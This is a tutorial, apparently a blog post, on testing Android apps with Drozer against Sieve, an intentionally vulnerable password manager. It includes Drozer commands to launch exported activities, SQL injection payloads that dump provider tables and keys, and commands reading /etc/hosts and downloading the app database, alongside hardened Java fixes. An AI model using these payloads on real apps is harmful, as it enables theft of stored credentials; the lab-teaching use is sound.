Test examples for security evaluation of Android applications using Drozer
After reading the Drozer user documentation I tried it against several Android apps; the few I tested showed basically no problems, so I used Sieve, the deliberately vulnerable app the Drozer team provides, to practice. The installation and evaluation steps are roughly the headings below.
1 Installing Sieve on an Android device
Sieve is a password manager app that contains several common Android app flaws, built so you can practice with Drozer. Download sieve.apk from https://www.mwrinfosecurity.com/system/assets/380/original/sieve.apk. Open the emulator and install Sieve: adb install sieve.apk
Then set up Sieve: on first use you set the password and PIN that are required to open the app. Then add some account/password entries for it to manage.
There are other features in the settings:
2 Get app package info
Each Drozer module has a specific function:
The modules that get app package information live under app.package.*:
2.1 Get the package name of all installed apps on Android device
The command is:
run app.package.list
This command lists all apps. To find a specific app, add the -f [app keyword] parameter, for example to find Sieve's package name on the device:
run app.package.list -f sieve
Note: when typing a command you can press Tab to auto-complete the package name, so you don't have to remember com.mwr.example.sieve.
2.2 Get basic information on Sieve
The command is:
run app.package.info -a com.mwr.example.sieve
This shows Sieve's version, the directory where its data is stored, the user ID, the group ID, whether it has shared libraries, and its permissions.
2.3 Identify the attack surface
This tutorial focuses on weaknesses in Android's built-in IPC mechanism that cause an app to leak sensitive information to other apps on the same device. The command to find the components that make up the attack surface is:
run app.package.attacksurface com.mwr.example.sieve
The result shows the number of potentially exploitable components. "Exported" means the component can be used by other apps. "is debuggable" means a debugger can be attached to the app's process with ADB.
2.4 Get further information on the attack surface
The command to get further information about the Activity part of the attack surface is:
run app.activity.info -a com.mwr.example.sieve
MainLoginActivity is the main screen when the app starts, so it has to be exported; the other two activities theoretically should not be exported.
2.5 Start activities
PWList and FileSelectActivity are exported and require no permission, so we can start them from Drozer. PWList looks like the more valuable one, so let's start it; the command is:
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
The effect after startup:
How to use app.activity.start:
help app.activity.start
Usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]] [--component PACKAGE COMPONENT] [--data-uri DATA_URI] [--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]] [--mimetype MIMETYPE]
Starts an Activity using the formulated intent.
2.6 Getting information from content providers
Following on from section 2.3, the command to get further information about the content providers' attack surface is:
run app.provider.info -a com.mwr.example.sieve
This shows the details of the two exported content providers from section 2.3, including names, permissions, paths, and so on.
2.6.1 Finding URIs that can access the content provider (data leaks)
From the previous section we guessed that DBContentProvider holds a database of some form, but we don't know how the data is organised. A content URI must have the form "content://authority/path", so we can construct partial content URIs to access DBContentProvider. There is a path "/Keys" that requires the READ_KEYS and WRITE_KEYS permissions to read and write.
Drozer's scanner module provides a way to guess which content URIs might exist:
run scanner.provider.finduris -a com.mwr.example.sieve
The scanner has found a URI through which content is accessible; we can then use other Drozer modules with that URI to read and even change the content. For example:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
This returns the username, the email account, and the Base64-encoded password string.
2.6.2 SQL injection
Android recommends the SQLite database for storing user data. SQLite uses SQL statements, so SQL injection is possible: through the projection and selection parameters you can pass simple SQL injection payloads to the content provider. For example:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
After the two commands above are executed, the Android device returns a very detailed error message.
Use SQL injection to list all tables in the database:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
Use SQL injection to list the contents of a table:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
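The injection above works because the provider splices the caller's projection and selection straight into the SQL it builds. The following is an added example, not Sieve's source: a hypothetical provider query() written the vulnerable way next to a hardened version that uses Android's SQLiteQueryBuilder with a projection map and strict mode, so a projection such as "* FROM SQLITE_MASTER WHERE type='table';--" is rejected instead of executed. The table and column names are assumed for illustration.

```java
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;
import android.text.TextUtils;
import java.util.HashMap;
import java.util.Map;

// Hypothetical helpers showing the two query styles; not Sieve's code.
public final class PasswordsQuery {

    // VULNERABLE: the caller's projection and selection are concatenated into raw SQL,
    // so a projection of "* FROM SQLITE_MASTER WHERE type='table';--" rewrites the query
    // and a selection of "'" produces the verbose SQLite syntax error seen above.
    static Cursor queryVulnerable(SQLiteDatabase db, String[] projection, String selection) {
        String cols = (projection == null) ? "*" : TextUtils.join(",", projection);
        String sql = "SELECT " + cols + " FROM Passwords";
        if (selection != null) {
            sql += " WHERE " + selection;   // selection is injected verbatim as well
        }
        return db.rawQuery(sql, null);
    }

    // HARDENED: only allow-listed column names may appear in the projection (assumed
    // column set), values go through selectionArgs as bound parameters, and strict
    // mode makes the builder validate the selection as an expression, not a SQL fragment.
    private static final Map<String, String> PROJECTION_MAP = new HashMap<>();
    static {
        PROJECTION_MAP.put("_id", "_id");
        PROJECTION_MAP.put("service", "service");
        PROJECTION_MAP.put("username", "username");
        PROJECTION_MAP.put("email", "email");
        // No "password" entry: that column can never be selected through the provider.
    }

    static Cursor queryHardened(SQLiteDatabase db, String[] projection,
                                String selection, String[] selectionArgs) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("Passwords");
        qb.setProjectionMap(PROJECTION_MAP);  // unknown column -> IllegalArgumentException
        qb.setStrict(true);                   // API 14+: rejects malformed/injected selections
        return qb.query(db, projection, selection, selectionArgs, null, null, null);
    }
}
```

Even with the hardened query, the provider should also be non-exported or protected by a permission, as section 2.3 shows for the /Keys path.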
2.6.3 Getting information from file system-backed content providers
A file system-backed content provider gives access to the underlying file system. The Android sandbox normally prevents apps from sharing files, but a file system-backed content provider lets apps share files. For Sieve we can infer that FileBackupProvider is a file system-backed content provider. We can use Drozer's app.provider.read module to view a file:
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
You can download files using app.provider.download:
run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
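The reads above succeed because the provider treats the URI path as an absolute filesystem path. As an added example (hypothetical helper, not Sieve's FileBackupProvider), here is that pattern next to a hardened openFile() helper that resolves the path under a fixed export directory and checks the canonical path stays inside it, which blocks both absolute paths and ".." traversal.

```java
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;

// Hypothetical helpers for a file-backed provider's openFile(); not Sieve's code.
public final class BackupFileAccess {

    // VULNERABLE: the URI path is used directly as a filesystem path, so any file the
    // app's UID can read (e.g. /etc/hosts or the app's own database) is served to callers.
    static ParcelFileDescriptor openVulnerable(Uri uri) throws FileNotFoundException {
        File f = new File(uri.getPath());
        return ParcelFileDescriptor.open(f, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // HARDENED: the URI path is resolved relative to an export directory chosen by the
    // app, and the canonical path (".." and symlinks resolved) must remain inside it.
    static ParcelFileDescriptor openWithinRoot(File exportRoot, Uri uri)
            throws FileNotFoundException {
        String rel = uri.getPath();
        if (rel == null || rel.isEmpty()) {
            throw new FileNotFoundException("empty path");
        }
        // On Android/Unix, File(parent, "/etc/hosts") resolves to exportRoot/etc/hosts,
        // so an absolute child path cannot escape the root by itself.
        File requested = new File(exportRoot, rel);
        try {
            String root = exportRoot.getCanonicalPath() + File.separator;
            String canonical = requested.getCanonicalPath();
            if (!canonical.startsWith(root)) {
                throw new FileNotFoundException("path escapes export directory: " + rel);
            }
        } catch (IOException e) {
            throw new FileNotFoundException("cannot resolve path: " + rel);
        }
        return ParcelFileDescriptor.open(requested, ParcelFileDescriptor.MODE_READ_ONLY);
    }
}
```

The scanner.provider.traversal module in section 2.6.4 is the quick way to test whether a provider still accepts such paths after the fix.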
2.6.4 Checking content providers for vulnerabilities
Check for SQL injection:
run scanner.provider.injection -a com.mwr.example.sieve
Check for directory traversal vulnerabilities:
run scanner.provider.traversal -a com.mwr.example.sieve
Summary of experience: I think that after getting the basic package information, it is best to first run the scanner modules to sweep for vulnerabilities or points of interest, and then take the next step from there.
2.7 Interacting with services
The command to get the services that are exported is:
run app.service.info -a com.mwr.example.sieve
About the service module:
To send a message to a service:
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.CryptoService --msg 1 5 3
Results returned:
I don't understand why this is returned; the number of segments is not enough.
2.8 Other common modules
- shell.start: open an interactive Linux shell on the Android device
- tools.file.upload / tools.file.download: upload or download files
- tools.setup.busybox / tools.setup.minimalsu: install BusyBox or minimal-su on the Android device
Installing and using Drozer on Ubuntu 14.04 (July 22, 2014)
1. Drozer tools
(omitted)
2. Installing the tools
2.1 Prerequisites
Make sure the following is installed on the PC's operating system:
64-bit Ubuntu 14.04 needs ia32-libs installed. Make sure adb and Java are on the system PATH.
2.2 Installing Drozer on Ubuntu
Drozer can be downloaded from the official website https://www.mwrinfosecurity.com/products/drozer/community-edition/ as a .deb package that installs directly. You can also download the .egg Python package, which requires you to manually download and install the protobuf and twisted packages yourself. I installed the .deb package directly.
2.3 Installing the agent (agent.apk) on the phone or emulator
Download agent.apk and install it with the command:
adb install agent.apk
3 Using Drozer
3.1 Connecting the Drozer console to the Drozer agent and opening a session
Step 1: Set up port forwarding. Drozer uses port 31415 by default. The following command forwards all traffic on Ubuntu TCP port 31415 to port 31415 on the phone:
adb forward tcp:31415 tcp:31415
Step 2: Start the agent server on the Android device: select the "Embedded Server" option, then select "Enable" to turn the agent server on.
Step 3: Connect the Drozer console to the agent server. Enter the command in the Ubuntu terminal:
drozer console connect
When it opens it looks like this:
3.2 Drozer console commands
The Drozer console is a command-line environment similar to a bash shell. It provides a range of modules for evaluating the security of Android devices, each with a clear function. The command descriptions below are my own translation of the official documentation and may not be accurate:
| Command | Description | Notes |
| --- | --- | --- |
| run MODULE | Run a Drozer module | |
| list or ls | Display all Drozer modules that can be executed in the current session | Modules you do not have permission to execute are hidden |
| shell | Open an interactive Linux shell in the context of the agent process on the device | |
| cd | Mount a module namespace as the current context | Avoids repeating the full module name on every command |
| clean | Remove the temporary files Drozer stored on the Android device | |
| contributors | List the people who contributed to the Drozer framework | |
| echo | Display text in the console | |
| exit | End the Drozer session | |
| help | Display help for a command or module | |
| load | Load and sequentially run a file containing a series of Drozer commands | |
| module | Find and install Drozer extension modules from the Internet | |
| permissions | Display the permissions the Drozer agent has been granted | |
| set | Assign a value to a variable that can be used as an environment variable | e.g. set host=193.168.1.1 |
| unset | Remove an assignment | |
| ... | | |
First use list to display all modules, then use the cd command to enter the scanner module, then try the set, echo and unset commands:
The command description from the official documentation:
Using Drozer to evaluate the app (reprint)